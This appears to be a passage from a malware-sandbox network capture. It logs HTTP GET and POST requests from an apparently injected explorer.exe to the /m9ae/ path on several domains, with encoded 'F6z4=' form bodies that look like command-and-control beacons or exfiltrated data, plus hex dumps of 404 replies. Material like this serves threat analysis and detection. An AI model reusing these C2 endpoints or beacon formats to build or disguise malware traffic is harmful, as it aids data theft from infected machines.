                                                                                                                        Nov 29, 2022 10:35:26.517757893 CET283OUTGET /m9ae/?F6z4=SKemUsRCc/T/1VtJMmoBZUTfzvZVAKOrpHPFHv5bIcLS1NPOIJ3jWavklE8DT12a+oeWOwZfdDSidPGYCemgiB/muCJBu0rQaA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.tommy57.shop
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:35:26.648845911 CET284INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 626
                                                                                                                        Connection: close
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:26 GMT
                                                                                                                        Server: Apache
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        19192.168.2.54973493.179.127.2780C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:32.472700119 CET292OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.700544.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.700544.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.700544.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 42 73 54 33 6f 54 36 6f 71 43 51 51 75 69 61 75 63 67 58 74 78 78 58 51 62 38 7e 30 4b 41 36 34 69 68 33 54 57 4b 61 62 55 43 65 4c 53 6a 72 44 41 4e 47 65 56 67 74 43 31 4b 42 64 41 4c 70 44 65 57 53 4d 51 51 79 62 5a 58 6a 51 69 41 28 42 37 43 72 37 34 55 6e 6d 35 69 78 45 75 53 38 4e 30 4e 69 35 57 78 35 61 35 37 6f 43 4d 69 43 72 6e 30 58 39 59 78 65 64 47 6a 74 36 69 6b 6f 64 50 55 73 33 45 6c 39 65 63 33 49 76 34 33 4a 78 48 31 49 55 4b 76 55 35 35 4a 36 64 4f 61 37 31 71 6f 79 42 76 4e 50 6e 4e 4f 57 77 78 6a 78 38 28 53 62 72 36 57 74 34 53 41 46 34 6e 5a 28 4d 6f 54 36 6a 52 74 36 4b 57 69 51 49 33 79 6a 33 4e 7a 37 30 7e 78 28 39 6b 5f 34 39 45 64 6a 48 52 4c 6d 4d 4a 38 36 78 6d 64 51 72 63 75 35 57 78 69 33 55 52 4c 49 64 47 71 6e 43 79 75 55 6b 48 45 6b 6a 78 46 42 2d 4d 72 74 73 53 4a 4c 38 44 42 34 45 45 41 4a 59 51 61 31 76 64 4a 33 30 74 34 38 75 6d 4f 56 4f 57 35 58 56 72 66 61 47 63 58 70 30 59 6a 33 67 59 79 6f 58 76 74 77 56 51 32 7e 71 6f 43 74 4b 68 73 76 52 63 7a 57 6d 44 6f 6e 44 34 45 44 6d 53 39 44 6d 33 65 45 2d 6c 70 47 34 53 45 35 68 78 6e 6e 72 6b 47 46 44 78 39 6d 53 58 31 59 66 43 64 63 77 52 50 69 73 55 6f 56 30 52 55 61 54 4e 46 59 52 41 6d 35 6d 31 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=BsT3oT6oqCQQuiaucgXtxxXQb8~0KA64ih3TWKabUCeLSjrDANGeVgtC1KBdALpDeWSMQQybZXjQiA(B7Cr74Unm5ixEuS8N0Ni5Wx5a57oCMiCrn0X9YxedGjt6ikodPUs3El9ec3Iv43JxH1IUKvU55J6dOa71qoyBvNPnNOWwxjx8(Sbr6Wt4SAF4nZ(MoT6jRt6KWiQI3yj3Nz70~x(9k_49EdjHRLmMJ86xmdQrcu5Wxi3URLIdGqnCyuUkHEkjxFB-MrtsSJL8DB4EEAJYQa1vdJ30t48umOVOW5XVrfaGcXp0Yj3gYyoXvtwVQ2~qoCtKhsvRczWmDonD4EDmS9Dm3eE-lpG4SE5hxnnrkGFDx9mSX1YfCdcwRPisUoV0RUaTNFYRAm5m1g).


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.2.549714192.185.90.10580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:34:35.314305067 CET202OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.gmrsnodes.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.gmrsnodes.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.gmrsnodes.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 72 79 74 59 37 68 71 32 6b 38 49 32 45 67 56 31 74 62 33 36 6d 6b 75 53 65 4c 4c 30 7a 30 54 70 34 6d 46 55 76 75 45 69 28 43 30 7a 68 32 46 65 4a 37 52 66 71 61 65 53 46 45 32 5a 75 6d 66 6e 31 45 65 36 33 75 66 38 45 72 52 7a 42 32 61 55 32 55 6d 30 39 51 4c 55 75 56 49 4a 36 46 4e 35 35 57 38 62 4a 2d 4c 66 7e 65 6d 52 28 2d 45 54 4a 4d 72 52 6c 57 4b 43 53 64 73 35 61 64 72 37 67 64 76 4e 4b 7a 72 36 58 70 33 69 59 43 53 64 73 6e 44 53 73 5a 36 57 43 68 4f 6f 4e 4d 6f 78 56 51 45 4a 77 30 6b 76 34 6b 6b 55 53 45 32 6a 30 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=rytY7hq2k8I2EgV1tb36mkuSeLL0z0Tp4mFUvuEi(C0zh2FeJ7RfqaeSFE2Zumfn1Ee63uf8ErRzB2aU2Um09QLUuVIJ6FN55W8bJ-Lf~emR(-ETJMrRlWKCSds5adr7gdvNKzr6Xp3iYCSdsnDSsZ6WChOoNMoxVQEJw0kv4kkUSE2j0g).
                                                                                                                        Nov 29, 2022 10:34:35.449829102 CET204INHTTP/1.1 404 Not Found
                                                                                                                        Date: Tue, 29 Nov 2022 09:34:35 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2,h2c
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Sun, 02 Oct 2022 12:42:28 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Content-Length: 4677
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 ef 66 51 6d 42 3c ff 71 d3 a2 7f 4d 5a 71 d4 a1 ce ba 30 26 a4 d2 ef d3 56 1c ef 82 80 96 ab 6b 14 93 95 8e 49 26 3b f9 fa 41 83 05 ea 7d 2a 6d a5 44 33 d4 a4 71 b1 99 49 63 79 2b 21 45 66 c8 7d ce 7e f9 e5 e0 60 b1 69 91 ef a6 ab dd a3 c9 f3 17 2f 7e 5d ec ba 42 9a b5 cd c3 17 bf 26 87
                                                                                                                        Data Ascii: RmssgJ&av$NmRmHInM=_cpw~y3(\G(z}[832qQtjEl0;hQoAqK/^zPP`1PP%J^Vyg::<s}k9=v]Ivs8w>;]Np3xyvGe)e,v&FVIJqM3Hhp8(a{8jotEI.6q^>YZQH]rBis_4:Jar!c(j):{{d!5Dh4+k5yUD$wZ}YQO,5I>i6<]2XpCMe^Wh2.|~l'|v,sTWdG'8RFOE>8.V?\~[KJzp=4LB)YyuFMYb;Cd5[&TWRd{/_lyoY'+G;G\?zJL9*~"P,EO$}(OW<2X!SSQrxOx"#DJMAP!3-uH26?<gR;1<]9G$Vp0sBQ=f%afQmB<qMZq0&VkI&;A}*mD3qIcy+!Ef}~`i/~]B&
                                                                                                                        Nov 29, 2022 10:34:35.449894905 CET205INData Raw: 2f 56 43 53 84 7b 98 88 e4 2e 37 54 eb b4 bf 38 87 cf fd bf 11 0b 31 29 f2 c2 cf d5 1c 2c 29 99 f2 56 8a 87 e9 e1 08 2a 91 a6 52 e7 43 78 ce 7b 6b 7f 5f d6 68 0b 54 ea fe 21 64 6e 44 33 da c1 62 a2 78 69 04 dd db ac 90 0e bf 1a 78 1c 05 b3 c7 cb
                                                                                                                        Data Ascii: /VCS{.7T81),)V*RCx{k_hT!dnD3bxixqTHr2=-c/7UtoGc-'9_e$'(e66FANz=86CG]__^g^v/o[[iG^6|h7+*(Dk3Aa0;
                                                                                                                        Nov 29, 2022 10:34:35.449937105 CET206INData Raw: c9 54 67 1a 30 2b f3 7c c0 9d 7f 7e 40 28 27 a3 a2 c2 c4 c1 7f 48 9c c1 95 9f 7b a1 33 da 0f 6a 73 72 14 8e bf c3 54 0a b8 15 93 4d 85 8f e2 89 a2 e4 ee 73 4d dc 93 44 09 6b 3d bb 14 7b e3 c2 b9 6a 18 2d da 1c 9a 9d e4 b2 6f 1b 1b 85 7c 6d 34 61
                                                                                                                        Data Ascii: Tg0+|~@('H{3jsrTMsMDk={j-o|m4aG+.<W6CYkGm^jTRm=9tMj=;74O'y'*22m=3}J'5Ks]lT:_0Y26F8InG.6_dzUZq4"s5R4=(f'{c8
                                                                                                                        Nov 29, 2022 10:34:35.449982882 CET207INData Raw: fb f0 37 a2 52 89 70 e5 1d 57 4f fb 7e a6 e9 fa a0 ae 62 ab 21 d6 2f 10 97 72 01 9f 08 bd 14 f9 40 e3 85 f3 fd ae 88 fb cd ed 6c 9d f6 05 2d 45 03 1a db 0a fb ea 6c 0d 09 c9 f1 51 4b be d9 24 b5 db 67 c9 06 a6 de f8 da b2 59 c2 7a 4b 6f 0b 46 b7
                                                                                                                        Data Ascii: 7RpWO~b!/r@l-ElQK$gYzKoFfKl]DX>+5Oj<u.K!t[EVdpiJ<8)3~(9szG|o(X\v#S3fuHpi"S)*f.Tr#'


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        20192.168.2.54973593.179.127.2780C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:34.852971077 CET293OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.700544.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.700544.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.700544.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 42 73 54 33 6f 54 36 6f 71 43 51 51 75 52 65 75 63 58 44 74 35 52 58 51 5a 38 7e 32 4b 41 37 2d 69 68 32 62 57 49 32 4c 54 31 36 4c 53 78 7a 44 41 5f 75 65 57 67 74 64 39 71 42 5a 4f 72 70 73 65 57 53 36 51 52 4f 62 5a 58 66 51 69 46 44 42 37 30 6a 34 71 6b 6e 65 30 43 78 48 71 53 39 46 30 4a 44 6a 57 7a 39 61 35 34 63 43 4d 56 57 72 6a 79 44 79 66 52 65 65 4a 44 73 38 70 45 70 4a 50 55 74 6d 45 6c 38 57 63 78 4d 76 35 48 35 78 57 6d 67 62 64 5f 56 7a 6e 5a 36 4a 48 6f 79 61 75 4b 50 4c 70 65 47 4e 54 2d 7a 73 6c 69 45 32 69 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=BsT3oT6oqCQQuReucXDt5RXQZ8~2KA7-ih2bWI2LT16LSxzDA_ueWgtd9qBZOrpseWS6QRObZXfQiFDB70j4qkne0CxHqS9F0JDjWz9a54cCMVWrjyDyfReeJDs8pEpJPUtmEl8WcxMv5H5xWmgbd_VznZ6JHoyauKPLpeGNT-zsliE2iA).


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        21192.168.2.54973693.179.127.2780C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:37.226496935 CET294OUTGET /m9ae/?F6z4=Mu7XrmbNuBpRkVuoTBGU/iHqS/OhVA7Any/uXbqYT12baRfdD/rxJiFT6KJrK4J1cV2pSA20UCfshAzQrgjlnBPfig9iswk20g==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.700544.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        22192.168.2.549737198.54.121.8180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:42.808341026 CET296OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.porggiret.site
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.porggiret.site
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.porggiret.site/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 6f 59 56 30 43 61 50 48 57 48 77 35 44 6b 33 35 63 35 46 70 67 38 66 54 31 64 45 52 56 78 35 66 52 49 74 46 54 48 50 32 4d 58 6e 75 69 77 42 49 4e 35 63 4c 34 79 45 71 4d 5f 7e 50 32 73 58 62 78 31 58 45 6f 78 33 4e 50 39 46 62 4b 64 58 77 38 5f 76 44 76 38 54 4f 4b 74 7e 35 6e 42 35 4a 73 63 56 34 6f 36 51 68 62 77 35 51 53 7a 59 59 7a 64 51 57 7a 5f 61 66 41 30 47 51 54 41 6f 36 55 56 49 70 4d 65 4b 5a 38 61 4c 46 54 54 36 41 73 78 37 79 32 6b 33 41 42 7a 77 56 6a 76 46 44 4c 56 28 4f 38 52 36 52 4a 38 42 49 28 37 43 47 4a 63 54 38 4e 61 30 33 75 4b 76 58 62 4a 54 42 31 62 4d 36 75 78 4f 73 50 54 62 78 76 2d 72 39 54 66 64 74 47 45 6d 69 44 61 7a 38 74 6f 4e 42 33 66 28 76 4f 39 4c 6f 39 73 36 4e 7a 38 47 4d 63 4e 51 5f 53 5f 4a 58 32 31 55 59 51 54 43 78 7e 39 58 57 7a 48 51 42 6e 63 6a 53 53 74 46 63 38 72 56 43 67 63 53 73 78 54 71 66 6d 67 72 6a 62 62 77 7a 51 57 72 71 77 77 45 75 61 49 77 59 47 76 6b 5a 45 35 49 39 43 74 4b 61 75 49 41 4c 77 58 73 69 71 56 50 7a 77 31 70 6e 78 33 54 34 4d 44 37 43 41 5f 37 53 35 6e 38 2d 4a 74 4e 4d 4d 78 37 7a 45 5a 43 50 78 73 57 74 35 30 7a 63 52 4d 64 69 59 74 37 41 7e 6a 55 77 67 5a 30 54 7a 79 78 68 34 45 49 41 32 6c 6b 42 57 6f 59 46 36 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=oYV0CaPHWHw5Dk35c5Fpg8fT1dERVx5fRItFTHP2MXnuiwBIN5cL4yEqM_~P2sXbx1XEox3NP9FbKdXw8_vDv8TOKt~5nB5JscV4o6Qhbw5QSzYYzdQWz_afA0GQTAo6UVIpMeKZ8aLFTT6Asx7y2k3ABzwVjvFDLV(O8R6RJ8BI(7CGJcT8Na03uKvXbJTB1bM6uxOsPTbxv-r9TfdtGEmiDaz8toNB3f(vO9Lo9s6Nz8GMcNQ_S_JX21UYQTCx~9XWzHQBncjSStFc8rVCgcSsxTqfmgrjbbwzQWrqwwEuaIwYGvkZE5I9CtKauIALwXsiqVPzw1pnx3T4MD7CA_7S5n8-JtNMMx7zEZCPxsWt50zcRMdiYt7A~jUwgZ0Tzyxh4EIA2lkBWoYF6Q).
                                                                                                                        Nov 29, 2022 10:35:43.111404896 CET296INHTTP/1.1 404 Not Found
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:42 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 570
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        23192.168.2.549738198.54.121.8180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:45.158920050 CET297OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.porggiret.site
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.porggiret.site
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.porggiret.site/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 6f 59 56 30 43 61 50 48 57 48 77 35 44 58 66 35 66 4b 39 70 72 63 66 54 39 39 45 58 56 78 35 59 52 49 74 4a 54 47 37 63 4d 6b 58 75 68 6c 39 49 4e 4d 41 4c 28 79 45 72 44 66 7e 44 34 4d 58 30 78 31 58 75 6f 7a 6a 4e 50 39 42 62 4b 66 66 77 39 4f 76 41 75 38 54 32 49 74 7e 32 6a 42 35 59 73 59 31 73 6f 34 55 68 62 7a 4e 51 53 41 63 59 33 62 6b 56 33 66 61 61 4e 6b 47 58 61 67 70 37 55 56 49 4c 4d 65 4b 67 38 65 37 46 53 6a 71 41 74 54 54 78 28 6b 33 42 66 44 78 65 31 74 34 33 47 6e 72 36 70 43 7a 68 51 59 6b 68 39 34 7a 34 57 41 29 2e 00 00 00 00 00 00 00 00
